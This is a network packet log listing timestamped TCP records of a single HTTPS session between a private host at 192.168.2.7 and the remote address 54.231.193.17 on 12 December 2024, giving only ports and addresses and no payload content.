Dec 12, 2024 17:39:33.832679987 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.832734108 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.832752943 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.832782030 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.868702888 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.868745089 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.868882895 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.868923903 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.913760900 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.919059038 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.939357042 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.939393997 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.939414024 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.939420938 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.939444065 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.939466953 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.939492941 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.964781046 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.964793921 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.964838982 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.964883089 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.964889050 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.964917898 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.964917898 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.964930058 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.964948893 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.964977980 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.985327959 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.985342026 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.985380888 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.985414982 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.985476971 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.985491991 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.987642050 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.987649918 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.998503923 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.998528957 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.998568058 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.998578072 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.998598099 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.010828018 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.010879993 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.010910988 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.010919094 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.010953903 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.025742054 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.025774956 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.025819063 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.025831938 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.025895119 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.070094109 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.070101023 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.110769033 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.110795021 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.110831022 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.110873938 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.110887051 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.110914946 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.121588945 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.121628046 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.121642113 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.121661901 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.121673107 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.121685028 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.121727943 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.132208109 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.132230997 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.132260084 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.132317066 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.132328987 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.132344961 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.141772032 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.141815901 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.141843081 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.141858101 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.141887903 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.150909901 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.150935888 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.151011944 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.151022911 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.160058022 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.160111904 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.160137892 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.160146952 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.160176039 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.167197943 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.167259932 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.167325974 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.167332888 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.167341948 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.167359114 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.167392015 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.173440933 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.173463106 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.173497915 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.173536062 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.173547029 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.173579931 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.226258039 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.307871103 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.307888985 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.307940960 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.307945013 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.308002949 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.308010101 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.308284044 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.308357000 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.313728094 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.313745975 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.313791037 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.313803911 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.313848972 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.319835901 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.319880009 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.319921017 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.319928885 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.319997072 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.320632935 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.320687056 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.326776981 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.326795101 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.326822996 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.326888084 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.326899052 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.326967001 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.332528114 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.332547903 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.332607985 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.332628965 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.332653046 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.338690996 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.338740110 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.338778019 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.338785887 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.338821888 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.344858885 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.344903946 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.344938040 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.344963074 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.345004082 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.398154974 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.398186922 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.445020914 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.498651981 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.498670101 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.498718023 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.498738050 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.498761892 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.498800993 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.498815060 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.498852968 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.499356985 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.504661083 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.504683018 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.504744053 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.504755020 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.511629105 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.511667967 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.511692047 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.511699915 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.511763096 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.511773109 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.511997938 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.517862082 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.517882109 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.517915010 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.517939091 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.517949104 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.517977953 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.523845911 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.523866892 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.523915052 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.523926020 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.523955107 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.529673100 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.529716015 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.529736042 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.529746056 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.529764891 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.536542892 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.536587954 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.536626101 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.536634922 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.536674023 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.543322086 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.543364048 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.543438911 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.543448925 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.543490887 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.543499947 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.543540955 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.714433908 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.714463949 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.714504004 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.714529991 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.714564085 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.714579105 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.716366053 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.716391087 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.716453075 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.716461897 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.716486931 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.719248056 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.719293118 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.719331980 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.719342947 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.719366074 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.723556995 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.723613977 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.723635912 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.723644972 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.723675013 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.730180979 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.730216026 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.730252028 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.730262995 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.730293036 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.730317116 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.736231089 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.736247063 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.736310959 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.736323118 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.736531973 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.736984015 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.742491007 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.742506027 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.742583036 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.742594004 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.788755894 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.788775921 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.828861952 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.882755041 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.882775068 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.882828951 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.882863045 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.882890940 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.882989883 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.882989883 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.883424997 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.888667107 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.888688087 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.888722897 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.888742924 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.888766050 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.895525932 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.895570040 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.895654917 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.895673037 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.895692110 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.901837111 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.901876926 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.902210951 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.902210951 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.902226925 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.907953024 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.907985926 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.908013105 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.908054113 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.908067942 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.908104897 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.908123970 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.914156914 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.914175987 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.914230108 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.914271116 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.914284945 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.914310932 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.920631886 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.920656919 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.920711040 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.920722961 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.920756102 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.926656961 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.926683903 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.926737070 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.926748991 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:34.926767111 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.979077101 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:34.979091883 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.023145914 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.078120947 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.078135967 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.078174114 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.078206062 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.078207970 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.078218937 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.078231096 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.078244925 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.078258038 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.084032059 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.084062099 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.084099054 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.084114075 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.084141970 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.090399027 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.090436935 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.090487003 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.090496063 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.090528965 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.096493959 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.096533060 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.096564054 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.096575975 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.096601963 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.103148937 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.103179932 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.103225946 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.103236914 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.103264093 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.108638048 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.108680010 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.108721972 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.108737946 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.108757973 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.115159988 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.115201950 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.115221024 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.115236044 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.115257978 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.163759947 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.163788080 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.210627079 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.266431093 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.266450882 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.266469955 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.266503096 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.266515017 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.266525984 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.266555071 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.266577005 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.267282963 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.273437023 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.273471117 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.273550987 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.273550987 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.273561954 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.279441118 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.279472113 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.279509068 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.279519081 CET	443	49770	54.231.193.17	192.168.2.7
